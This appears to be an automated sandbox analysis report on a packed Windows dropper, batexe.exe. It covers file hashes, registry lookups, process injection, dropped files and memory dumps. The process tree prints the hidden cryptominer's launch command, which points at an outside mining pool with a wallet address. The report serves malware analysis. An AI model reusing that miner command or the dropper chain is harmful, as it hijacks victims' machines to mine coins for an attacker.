73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
299s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18/02/2024, 17:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1624	b2e.exe
2260	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe
2260	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4876-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 1624	4876	batexe.exe	84
PID 4876 wrote to memory of 1624	4876	batexe.exe	84
PID 4876 wrote to memory of 1624	4876	batexe.exe	84
PID 1624 wrote to memory of 1360	1624	b2e.exe	86
PID 1624 wrote to memory of 1360	1624	b2e.exe	86
PID 1624 wrote to memory of 1360	1624	b2e.exe	86
PID 1360 wrote to memory of 2260	1360	cmd.exe	88
PID 1360 wrote to memory of 2260	1360	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4876
- C:\Users\Admin\AppData\Local\Temp\9579.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9579.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9579.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\980A.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1360
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9579.tmp\b2e.exe

Filesize
4.4MB

MD5
31ddc93c1cbe23e6664856e71c3c053d

SHA1
91b746d467f802d211645a15a9bf40b9e18cc5cb

SHA256
e1e0e5ff9dc5477d57df1143c454449bc5b4cd611c63990b0360d535a61b383e

SHA512
8b93f1b96e7c12dbd46fbcfd12dd081caacf218b7ccdcb308a272bec5735f4a8ad17497ebab46daac1ffad558923da81659aa0cffcd1cfb838ba9f428d4c9f73

Download Submit
C:\Users\Admin\AppData\Local\Temp\9579.tmp\b2e.exe

Filesize
2.4MB

MD5
02c5b1dd31e8283a3c23c066b179e977

SHA1
cffe90ff5c425d9798d08a05e5eebca72c963fcf

SHA256
2bc1c713a42fe7f9a2e765f6ffbb2a283a82d8e51d68e24a1629132462407623

SHA512
9f0f36718b07bac6cfc95b2869d89851801dca994b92da0523745cd36067a80dc05568f5c6418f9260f607e4fa4ffa5aab11b6fee60bb3277bc1bc290f5c0a46

Download Submit
C:\Users\Admin\AppData\Local\Temp\9579.tmp\b2e.exe

Filesize
2.9MB

MD5
b0fbea5426c5851943e774375b341d0b

SHA1
e44ffea3b5fccea4f4fdbb5e2aa087cc3158e54a

SHA256
dd7bc5149e8a79640b47304660b4dc68d33cc0107d116e41acaf730cb2e8cfb2

SHA512
e0856111f81b731bd0ed8ad6e152669ff1750eeb27037b701c0dc6432562128aa812bac8dda0afec03c3a860b3d473e158fd3cae25b179148986ceaf88fea0bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\980A.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
592KB

MD5
eb108478a36fca75e6856990a0ea30ca

SHA1
1468fc1739c59f3c6f5705d26bccd264abba101e

SHA256
48531563cf67071296f52ba825fedda767d9041d1ac1fa850a6472fb5f01527a

SHA512
b427cb30d467c16ed2aa290d47d391ff5f9abd108f157aadb8f66292d76664868d6089e4dd0bb509da7c0ca936922cc3826563eea33b9ba794b73eebb1abdede

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
611KB

MD5
49b0a6795ba125c7bb369ee8248ee47a

SHA1
44485a8b0adaec7c4cc36f48980d0fa6740342cb

SHA256
c2e103a42b983b32a390f024e00a846a8f0fac3ac6d60f337930466aad6064f6

SHA512
43bb852b70bf65cc4c4ab8d3bad64e9fdcdf4c3dd37d10876b875f74b270d48900dda3fed02558988fcafda13387d89727995e77aca474f7914a8647231759d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
402KB

MD5
5fd2aacc56e80f79219d4e088a3e30c0

SHA1
e0ea8ddecbf660d092350fb8389174427395eab8

SHA256
bee0653da604eb56429388ade2cf74c20a3bbd1777b4df8f5056aa68c32dd822

SHA512
5a42b0e18727f749a95b5c1f31656c0a3462ce9ceea81ea8a2e254e7b394064617c9f2ee754e2e69a805a63b725e05f4b86a19c2b07595a0f99ce50aad72ad6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
422KB

MD5
4adf3b558fb1e6392809fcb2d8b9c812

SHA1
42692ca0ad3a5f0a38b555f9a489b2602ab69a67

SHA256
2776549aa71729a9d3853c401474213fba9c2e8f5a4188fc3f860d18e4d123bd

SHA512
30f1f581223748d65d4ba892e30327cd005d9b975f6320985dc3549d628a00a62314a8fbfaee648b6847c8d02ee0648bc4af290be9cf35ae02631eab45c2a901

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
381KB

MD5
46f2f896d23cbac168b98b3e12adcc28

SHA1
7f384d3e91004ccf2ca1d3d319c6025a944b99c7

SHA256
ea7dbf9bce490327adc36eb01682c04c4ceaf2087cff354ef1cb636fae7084ba

SHA512
ce468c38d17abe401f655aada355caee3b3f5c7311f67ee727fb9a97aff64d793f81d08b17563bfd1d42260bb2c7486bc5706a80cc28128e8823153fd6f4f865

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
60fd280fe71c47f53366b5656b5fdb8d

SHA1
637a9c67d98bcb4151018f5122efb139bc6b72bb

SHA256
5a02a2642e22934471f5de8a3cd9485a4b0ad7dd7f697abc9e593cdc3f9c2ed8

SHA512
27a52d5365a7df62cd00fe38f1215fc7e42a4727bc1032ce53aeec09de2cd1991ee4ed4e46ad8337178051e2bd4baf33a1ebb1d351d2bef404d68f5cdf9e4f86

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
406KB

MD5
7029daff7447d19a1cb2ec7fcea01ca0

SHA1
414c6d8e646dd5325687176f95991b9ccd775d51

SHA256
ca73a40c8197b2efe7360691e7b341ea16add01afef4294142551e756a2afa4b

SHA512
2d5d6c5ad542ed91f18004445a1251331aa46349fdbdd37c36d7e59388c23ec9d552be55eea0c5fef2de432dbdf7931716b27c6c03107043f3c9a5aeb6da4287

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
841KB

MD5
c2c140d1c088072cf84ea2e9b4ea0367

SHA1
9fd8c0dc0fd55f5c69e6a61a3ee1dbc084aec677

SHA256
46d01fd128e3f5f582eae4000f39baf359ad41c499931ea9b8311d69f34b89eb

SHA512
f6251b6e10182f9b15c4f7f245884d73b6c698e610941238e3531da017d8d6474ca09c17ab24180243b4448577ef6c5fa3667a459811369f03b2e8add6a48e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
359KB

MD5
3e733eba9f5ea8cee8929ec7e1595238

SHA1
f25db5fe7927505c94126d7c5083d9070e2da0c3

SHA256
aac678b884941f028b3e0cac7646b8e9421f11e7f36cabbdc92f5732feede019

SHA512
e857c8c480b0957ef344093f81699cd68afc3b4e0b1b4ded5342cc105188254bcdecb3a831d8ecc13c56d00c091b02cb72ded9a0dc02e9726d650f987258869a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
388KB

MD5
13cc3014a4a3521237c9599f116bac92

SHA1
f0573dcdb9a5f47ac68f534955efaa63a8856022

SHA256
ca7d0f093b3e5a45e8e63418c18847ed073a50437a00c6476dceffe0a5519c29

SHA512
2dccb37434fd12cad77056d23f60a4a81c46db68bc0d9a33c66681c75c6367b2f6ef9f469aac2e01fec4c916fdd10c9988f5aee3a370de62ee24a2f5111a5d6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1624-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1624-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2260-45-0x00000000569B0000-0x0000000056A48000-memory.dmp

Filesize
608KB

Download
memory/2260-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2260-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2260-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2260-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2260-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4876-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download